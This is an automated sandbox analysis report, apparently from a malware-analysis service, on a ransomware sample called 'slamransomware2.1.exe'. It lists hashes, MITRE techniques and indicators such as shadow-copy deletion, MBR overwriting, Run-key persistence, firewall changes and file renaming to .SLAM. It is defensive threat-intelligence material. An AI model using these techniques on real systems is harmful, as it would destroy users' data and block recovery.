acb3d1eab482ba2428084e53cc04fbe08fed4c603861e9ce116b4e9aad2096cf

Resubmissions

23-01-2023 08:52

230123-kswaksce58 8

25-10-2022 11:24

221025-nhs91scebp 9

Analysis

max time kernel
600s
max time network
603s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
25-10-2022 11:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

slamransomware2.1.exe
Size

3.9MB
MD5

b4c5397ba985fe7770a4822f28343198
SHA1

18bb6536a8caa53fa006b0e78d4c4097ecee583f
SHA256

acb3d1eab482ba2428084e53cc04fbe08fed4c603861e9ce116b4e9aad2096cf
SHA512

c8b2ce7b61c5fda173ce404c4ca602a794db016a942a44fe50236dd3a54c047fb022c2772446e87744caeb5da02a3111e9169a0cebf83fca2e5c57fd765e3013
SSDEEP

49152:nbX8LRHjOGjBlB4XyGOkNdVxzyK8LRHjOGjBlB4XyGOkNdV5A:bX88cIyGOk3188cIyGOk3jA

Score

9^/10

bootkit discovery evasion exploit persistence ransomware

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Disables Task Manager via registry modification
evasion
Drops file in Drivers directory 1 IoCs

Processes:

WindowsFormsApp1.exe

description ioc process

File created C:\Windows\System32\drivers\etc\hosts WindowsFormsApp1.exe
Executes dropped EXE 7 IoCs

Processes:

uac.exeslam.exelector_mbr.exelo.exeWindowsFormsApp1.exembr.exeChromeRecovery.exe

pid process

2224 uac.exe
1980 slam.exe
4712 lector_mbr.exe
4564 lo.exe
4068 WindowsFormsApp1.exe
1600 mbr.exe
4308 ChromeRecovery.exe
Modifies Windows Firewall 1 TTPs 5 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

4492 netsh.exe
4844 netsh.exe
4964 netsh.exe
1752 netsh.exe
2080 netsh.exe

description	ioc	process
File created	C:\Windows\System32\drivers\etc\hosts	WindowsFormsApp1.exe

pid	process
2224	uac.exe
1980	slam.exe
4712	lector_mbr.exe
4564	lo.exe
4068	WindowsFormsApp1.exe
1600	mbr.exe
4308	ChromeRecovery.exe

pid	process
4492	netsh.exe
4844	netsh.exe
4964	netsh.exe
1752	netsh.exe
2080	netsh.exe

Modifies extensions of user files 10 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

WindowsFormsApp1.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\CloseConvertFrom.raw => C:\Users\Admin\Pictures\CloseConvertFrom.raw.SLAM	WindowsFormsApp1.exe
File renamed	C:\Users\Admin\Pictures\EditSearch.tif => C:\Users\Admin\Pictures\EditSearch.tif.SLAM	WindowsFormsApp1.exe
File renamed	C:\Users\Admin\Pictures\PushRevoke.png => C:\Users\Admin\Pictures\PushRevoke.png.SLAM	WindowsFormsApp1.exe
File renamed	C:\Users\Admin\Pictures\RestartRename.tiff => C:\Users\Admin\Pictures\RestartRename.tiff.SLAM	WindowsFormsApp1.exe
File renamed	C:\Users\Admin\Pictures\UpdateRepair.crw => C:\Users\Admin\Pictures\UpdateRepair.crw.SLAM	WindowsFormsApp1.exe
File renamed	C:\Users\Admin\Pictures\HideMeasure.crw => C:\Users\Admin\Pictures\HideMeasure.crw.SLAM	WindowsFormsApp1.exe
File renamed	C:\Users\Admin\Pictures\ReadRemove.tif => C:\Users\Admin\Pictures\ReadRemove.tif.SLAM	WindowsFormsApp1.exe
File opened for modification	C:\Users\Admin\Pictures\RestartRename.tiff	WindowsFormsApp1.exe
File opened for modification	C:\Users\Admin\Pictures\StepGrant.tiff	WindowsFormsApp1.exe
File renamed	C:\Users\Admin\Pictures\StepGrant.tiff => C:\Users\Admin\Pictures\StepGrant.tiff.SLAM	WindowsFormsApp1.exe

Possible privilege escalation attempt 4 IoCs
exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

4956 icacls.exe
204 takeown.exe
188 icacls.exe
2552 takeown.exe
Loads dropped DLL 4 IoCs

Processes:

uac.exelector_mbr.exe

pid process

2224 uac.exe
2224 uac.exe
4712 lector_mbr.exe
4712 lector_mbr.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

204 takeown.exe
188 icacls.exe
2552 takeown.exe
4956 icacls.exe

pid	process
4956	icacls.exe
204	takeown.exe
188	icacls.exe
2552	takeown.exe

pid	process
2224	uac.exe
2224	uac.exe
4712	lector_mbr.exe
4712	lector_mbr.exe

pid	process
204	takeown.exe
188	icacls.exe
2552	takeown.exe
4956	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mbr.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run	mbr.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\temp\\mbr.exe"	mbr.exe

Drops desktop.ini file(s) 9 IoCs

Processes:

WindowsFormsApp1.exe

description	ioc	process
File created	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	WindowsFormsApp1.exe
File created	C:\Users\Admin\Pictures\desktop.ini	WindowsFormsApp1.exe
File created	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	WindowsFormsApp1.exe
File created	C:\Users\Admin\Music\desktop.ini	WindowsFormsApp1.exe
File created	C:\Users\Admin\Videos\desktop.ini	WindowsFormsApp1.exe
File created	C:\Users\Admin\OneDrive\desktop.ini	WindowsFormsApp1.exe
File created	C:\Users\Admin\Desktop\desktop.ini	WindowsFormsApp1.exe
File created	C:\Users\Admin\Downloads\desktop.ini	WindowsFormsApp1.exe
File created	C:\Users\Admin\Documents\desktop.ini	WindowsFormsApp1.exe

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

lector_mbr.exembr.exe

description ioc process

File opened for modification \??\PhysicalDrive0 lector_mbr.exe
File opened for modification \??\PhysicalDrive0 mbr.exe
Drops file in System32 directory 1 IoCs

Processes:

lo.exe

description ioc process

File created C:\Windows\System32\LogonUI.exe lo.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	lector_mbr.exe
File opened for modification	\??\PhysicalDrive0	mbr.exe

description	ioc	process
File created	C:\Windows\System32\LogonUI.exe	lo.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

WindowsFormsApp1.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Control Panel\Desktop\Wallpaper = "C:\\temp\\backtrack.png"	WindowsFormsApp1.exe

Drops file in Program Files directory 7 IoCs

Processes:

elevation_service.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\ChromeRecovery.exe	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\ChromeRecovery.exe	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\manifest.json	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\manifest.json	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\_metadata\verified_contents.json	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\_metadata\verified_contents.json	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\ChromeRecoveryCRX.crx	elevation_service.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

firefox.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2388 schtasks.exe

pid	process
2388	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3788 vssadmin.exe

pid	process
3788	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 63 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs\url2 = "https://www.facebook.com/"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000742693025ef6ab4aa9808eab4c23bc9a000000000200000000001066000000010000200000005ee3aec32946da7d6644c13c579d72e5e347fb803566d212ccbef7eae26dcb8c000000000e800000000200002000000071fbb70c0e8715d855fe6d46119eecdd24fa39d653f060aeeaf419a8a2b620d020000000dc72166afbdec3a2c7eae8e88952e8fe2411ec35821e919f2d4e1351c387a1f840000000eab3896d8c2387cf7fb508d186789fe19ca98ada8ab779361a3691f5607ad8e8d1e3197b79774db0b22a1b08a659cc4dfe0d570d55aece1b81fc71f38b16dde3	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{B149CB72-5468-11ED-98FA-7A36BF7F232E} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2248755680"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs\url4 = "https://signin.ebay.com/ws/ebayisapi.dll"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url2 = 0000000000000000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30992501"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url1 = 0b74d59575e8d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs\url1 = "http://idomana.000webhostapp.com/"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000742693025ef6ab4aa9808eab4c23bc9a0000000002000000000010660000000100002000000026409ddb7cdac8685536548ea0f1cb4dccfa40ed9367d847cf31af397cb54c1e000000000e8000000002000020000000e1bedb7e79ed4f1d02d4f51d2639b6388709d49ee194c53803d59a80989cad76200000005e762d24580dc2c8c2bbc607d6af4d3a1c333a807fe90d63b6e2acef99cec957400000000d0de478e9bded95fb92ca671555dccfb0a508fded59737c4b17c21dd7fab7d095e9cc4178c7020c8f7d397892e22c1ef6d322328fd3b8813938f844629ec1a8	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30992501"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30992501"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "373469389"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz!	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "373517975"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2249686848"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs\url6 = "https://twitter.com/"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0f97ca875e8d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url3 = 0000000000000000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "373485983"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10e984a875e8d801	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url4 = 0000000000000000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs\url5 = "https://login.live.com/"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url5 = 0000000000000000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2249686848"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2248755680"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs\url3 = "https://login.aliexpress.com/"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url6 = 0000000000000000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30992501"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe

Modifies registry class 1 IoCs

Processes:

firefox.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings firefox.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

3648 reg.exe
3168 reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings	firefox.exe

pid	process
3648	reg.exe
3168	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

WindowsFormsApp1.exe

pid	process
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

chrome.exe

pid process

4876 chrome.exe
4876 chrome.exe
4876 chrome.exe
4876 chrome.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

takeown.exeWindowsFormsApp1.exetakeown.exevssvc.exeWMIC.exevssvc.exefirefox.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	204	takeown.exe
Token: SeDebugPrivilege	4068	WindowsFormsApp1.exe
Token: SeDebugPrivilege	4068	WindowsFormsApp1.exe
Token: SeTakeOwnershipPrivilege	2552	takeown.exe
Token: SeBackupPrivilege	3976	vssvc.exe
Token: SeRestorePrivilege	3976	vssvc.exe
Token: SeAuditPrivilege	3976	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4236	WMIC.exe
Token: SeSecurityPrivilege	4236	WMIC.exe
Token: SeTakeOwnershipPrivilege	4236	WMIC.exe
Token: SeLoadDriverPrivilege	4236	WMIC.exe
Token: SeSystemProfilePrivilege	4236	WMIC.exe
Token: SeSystemtimePrivilege	4236	WMIC.exe
Token: SeProfSingleProcessPrivilege	4236	WMIC.exe
Token: SeIncBasePriorityPrivilege	4236	WMIC.exe
Token: SeCreatePagefilePrivilege	4236	WMIC.exe
Token: SeBackupPrivilege	4236	WMIC.exe
Token: SeRestorePrivilege	4236	WMIC.exe
Token: SeShutdownPrivilege	4236	WMIC.exe
Token: SeDebugPrivilege	4236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4236	WMIC.exe
Token: SeRemoteShutdownPrivilege	4236	WMIC.exe
Token: SeUndockPrivilege	4236	WMIC.exe
Token: SeManageVolumePrivilege	4236	WMIC.exe
Token: 33	4236	WMIC.exe
Token: 34	4236	WMIC.exe
Token: 35	4236	WMIC.exe
Token: 36	4236	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4236	WMIC.exe
Token: SeSecurityPrivilege	4236	WMIC.exe
Token: SeTakeOwnershipPrivilege	4236	WMIC.exe
Token: SeLoadDriverPrivilege	4236	WMIC.exe
Token: SeSystemProfilePrivilege	4236	WMIC.exe
Token: SeSystemtimePrivilege	4236	WMIC.exe
Token: SeProfSingleProcessPrivilege	4236	WMIC.exe
Token: SeIncBasePriorityPrivilege	4236	WMIC.exe
Token: SeCreatePagefilePrivilege	4236	WMIC.exe
Token: SeBackupPrivilege	4236	WMIC.exe
Token: SeRestorePrivilege	4236	WMIC.exe
Token: SeShutdownPrivilege	4236	WMIC.exe
Token: SeDebugPrivilege	4236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4236	WMIC.exe
Token: SeRemoteShutdownPrivilege	4236	WMIC.exe
Token: SeUndockPrivilege	4236	WMIC.exe
Token: SeManageVolumePrivilege	4236	WMIC.exe
Token: 33	4236	WMIC.exe
Token: 34	4236	WMIC.exe
Token: 35	4236	WMIC.exe
Token: 36	4236	WMIC.exe
Token: SeBackupPrivilege	2700	vssvc.exe
Token: SeRestorePrivilege	2700	vssvc.exe
Token: SeAuditPrivilege	2700	vssvc.exe
Token: SeDebugPrivilege	1556	firefox.exe
Token: SeDebugPrivilege	1556	firefox.exe
Token: SeDebugPrivilege	1556	firefox.exe
Token: SeDebugPrivilege	1556	firefox.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

WindowsFormsApp1.exe

pid	process
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
4068	WindowsFormsApp1.exe
